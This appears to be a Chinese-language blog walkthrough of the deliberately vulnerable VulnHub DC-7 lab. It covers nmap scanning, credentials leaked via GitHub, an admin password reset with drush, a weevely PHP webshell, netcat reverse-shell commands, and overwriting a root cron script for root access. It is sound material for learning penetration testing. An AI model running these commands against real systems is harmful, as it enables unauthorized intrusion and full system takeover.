主頁 >  其他 > vulnhub DC7 靶場練習

vulnhub DC7 靶場練習

2021-08-23 06:51:10 其他

前言

這次練習的靶機是vulnhub平臺下的DC系列靶機第7臺,下載地址為https://www.vulnhub.com/entry/dc-7,356/,挑戰該靶機的最終目的是獲取root權限,然后讀取唯一的flag,這臺靶機中用暴力破解成功的概率非常小,我們需要開闊思路,尋找非技術上的方法,

虛擬機配置

這次采用的網路連接模式依然是NAT模式,為了避免掃描到其他物理主機,在匯入虛擬機后,右擊DC-6靶機,然后選中配置,依次點擊網路配置->NAT模式->高級->生成,然后確認即可,

在這里插入圖片描述

收集資訊

nmap -sn --min-parallelism 200 --min-hostgroup 256 192.168.119.0/24

-sn 代表存活主機掃描,不進行埠測探,

–min-parallelism 代表調整探測報文的并行度,也就是在掃描同一臺主機時會發送很多個探測資料包,這個引數指定的數即nmap一次至少要發多少個資料包,

–min-hostgroup 代表調整并行掃描組的大小,也就是一次性同時對多少臺主機進行掃描,

更詳細內容可以參考:https://zhuanlan.zhihu.com/p/322244582,關于nmap的一些性能引數的學習,

在這里插入圖片描述

發現靶機的IP地址為 192.168.119.167,然后用nmap對靶機進行詳細地掃描,

nmap -A -sV -p- --min-parallelism 200 192.168.119.167

-A 代表綜合性掃描,能收集很多重要的資訊

-sV 代表掃描主要的服務資訊

-p- 引數p是指定埠,后面的-代表所有埠,

在這里插入圖片描述

發現開放了 80埠和 22埠,還發現了一些敏感目錄,用瀏覽器打開網頁進一步收集更多的資訊,

在這里插入圖片描述

看網頁上面的提示,這些英文翻譯如下:

歡迎來到DC-7

DC-7引入了一些“新”概念,但我將讓你自己去弄清楚它們是什么,: -)

雖然這個挑戰并不完全是技術性的,但如果你需要訴諸暴力破解或字典攻擊,你可能不會成功,

你要做的,就是跳出框框去思考,

在盒子外面,:-)

盒子外面指的就是借助搜索引擎來收集敏感資訊,如果你經常看實戰類文章的話,就會發現很多情況下可以在github上找到目標網站原始碼,并在原始碼中發現資料庫的密碼,所以我們也來嘗試一下搜索該網站的原始碼,

在這里插入圖片描述

在底部能發現作者的id,我們就通過這個id來搜索該網站的原始碼,

在這里插入圖片描述

果然在github搜索到了一個名為 Dc7User的用戶,查看一下該用戶有沒有相關的原始碼,

在這里插入圖片描述

該用戶有一個專案,打開看了看,發現該專案與靶機DC-7上網站結構相似,估計這個就是靶機上網站的原始碼了,把它下載下來,地址為: https://github.com/Dc7User/staffdb.git

proxychains git clone https://github.com/Dc7User/staffdb.git

proxychains是一個代理程式,因為github的服務器在國外,所以通過代理程式下載速度會大大提高,該程式具體用法可以參考:https://www.jianshu.com/p/3f392367b41f,Ubuntu系統中使用ProxyChains設定網路代理

git clone 是將指定地址的程式克隆下來,

在這里插入圖片描述

進入目錄 staffdb,發現了一個組態檔 config.php,在這個組態檔中發現了資料庫的賬號和密碼:dc7userMdR3xOgB7#dW

cd staffdb
cat config.php

在這里插入圖片描述

尋找線索

已經得到了一個賬號和密碼,可以用這個賬號去嘗試一下遠程mysql登陸,網站后臺登陸,ssh登陸,能用得到賬號密碼的地方盡量嘗試一下,最終發現這個賬號可以通過ssh登陸,

ssh dc7user@192.168.119.167

在這里插入圖片描述

獲取到shell后第一步當然是嘗試一下suid提權啦,但是發現這臺靶機無法通過suid提權,按照經驗下一步就應該登陸資料庫查找關鍵資訊或者到用戶的家里面看看,但是發現mysql登陸不上,那就到用戶的家里面看看吧,

cd /home/dc7user
ls -la

在這里插入圖片描述

歷史記錄都指向了黑洞檔案,發現備份檔案夾 backups里面有兩個備份檔案,但是都加密了,還有一個郵件檔案,打開這個郵件檔案看看,

cat mbox

在這里插入圖片描述

通過郵件發現系統每隔15分鐘 就會執行一次 /opt/scripts/backups.sh來備份資料庫,而且是以root的身份來執行該腳本,接下來看看能不能修改該腳本,

cd /opt/scripts/
ls -la

在這里插入圖片描述

查看權限得知,自己只能讀取該和執行該檔案,但是發現屬于 www-data用戶組的賬號是可以修改該檔案的,一般情況下,通過一句話木馬建立的webshell都是以 www-data用戶運行的,所以下一步就是獲取一個webshell,

建立webshell

既然有對backups.sh的r權限,那么就查看一下這個檔案

cat backups.sh

在這里插入圖片描述

發現這個sh檔案里面使用了drush程式,一開始不知道drush的作用是什么,后來通過搜索引擎得知這是一個專門管理drupal網站的一個程式,也可以通過該程式直接修改用戶密碼,如果想用drush管理一個網站,那么就必須先跳轉到那個網站的目錄下,接下來就修改管理員 admin的密碼,

cd /var/www/html
drush user-password admin --password="admin"

user-password 后面跟著需要修改的用戶,

–password 后面為需要設定的密碼,

在這里插入圖片描述

修改密碼成功,現在就可以登陸網站后臺了,并把一句話木馬寫入網頁中,

在這里插入圖片描述

依次點擊 ManageContentEdit,然后編輯頁面,

在這里插入圖片描述

但是在編輯頁面發現不可以寫入php代碼,后來經過查詢發現該網站可以安裝一個模塊后就可以寫入php代碼了,模塊的下載地址為 https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

在這里插入圖片描述

下面就準備匯入模塊,依次點擊 ManageExtendInstall new module

在這里插入圖片描述

然后在第一個文本框內填入模塊地址,點擊 install按鈕進行安裝,

在這里插入圖片描述

安裝完成后會出現如下圖所示界面,現在還不能用該模塊,需要開啟后才能使用,所以需要點擊 Enable newly added modules來開啟這個模塊,

在這里插入圖片描述

找到 PHP Filter并勾選該選項,然后點擊最底部的 install

在這里插入圖片描述

在這里插入圖片描述

開啟 PHP Filter成功后會出現下面這個界面,

在這里插入圖片描述

再次回到編輯頁面時發現現在可以寫入PHP代碼了,

在這里插入圖片描述

用weevely生成一個木馬,

weevely generate a a.php

generate 代表生成木馬

a 為木馬連接時的密碼

a.php 為木馬的檔案名

在這里插入圖片描述

然后將 a.php里面的內容粘貼到編輯頁面的打文本框里面,檔案格式選擇 PHP Code,然后點擊 Save進行保存,

在這里插入圖片描述

保存后點擊剛剛修改頁面的標簽就會跳轉到該頁面,這樣就知道該頁面的地址了,

在這里插入圖片描述

從瀏覽器的地址欄得出該頁面的地址為:http://192.168.119.167/node/3

在這里插入圖片描述

接下來用weevely進行連接,

weevely http://192.168.119.167/node/3 a

a 為生成木馬時設定的密碼

在這里插入圖片描述

反彈shell

發現該webshell無法使用cd命令,用 echo $0來查看當前使用的shell程式,發現是sh,

在這里插入圖片描述

通過nc反彈一個基于bash的shell可以解決這一問題,nc反彈shell的詳細內容已經在前面多次講解,這里就不再詳細講解,只說明操作程序,

在kali本地終端上執行:

rlwrap nc -lvnp 4443

然后在webshell上執行

nc 192.168.119.130 4443 -e /bin/bash

現在已經反彈shell成功了,再回到本地終端執行一下命令升級shell,

python -c 'import pty;pty.spawn("/bin/bash")'

在這里插入圖片描述

提權

現在的shell是以www-data用戶來運行的,所以對backups.sh具有修改權限,

在這里插入圖片描述

所以我們將反彈shell的命令寫入 backups.sh 等待系統自動運行即可,因為剛剛在郵箱中發現系統每15分鐘就會以root的權限執行一次backups.sh,所以用root權限反彈shell就會獲取root權限,執行一下命令

cd /opt/scripts
echo "nc 192.168.119.130 4445 -e /bin/bash" > backups.sh

注意IP地址為本地kali的IP地址,

在這里插入圖片描述

然后再本地監聽4445埠,

rlwrap nc -lvnp 4445

在這里插入圖片描述

接下來就去洗個碗,洗完回來差不多就已經獲取root權限了,看到下圖紅框中文字說明反彈shell成功,

在這里插入圖片描述

cat /root/theflag.txt

在這里插入圖片描述

成功!還可以通過 passwd命令直接修改root的密碼,

參考文獻

[1] http://drupalchina.cn/node/3709,Drush的安裝配置和應用

[2] https://blog.csdn.net/weixin_43583637/article/details/102809227,Vulnhub靶機實戰——DC-7

[3] https://www.jianshu.com/p/3f392367b41f,Ubuntu系統中使用ProxyChains設定網路代理

[4] https://zhuanlan.zhihu.com/p/322244582,關于nmap的一些性能引數的學習,

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/295570.html

標籤:其他

上一篇:《小迪網路安全筆記》 第十二節:WEB漏洞-SQL注入之簡要SQL注入

下一篇:永恒之藍MS17-010漏洞利用

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more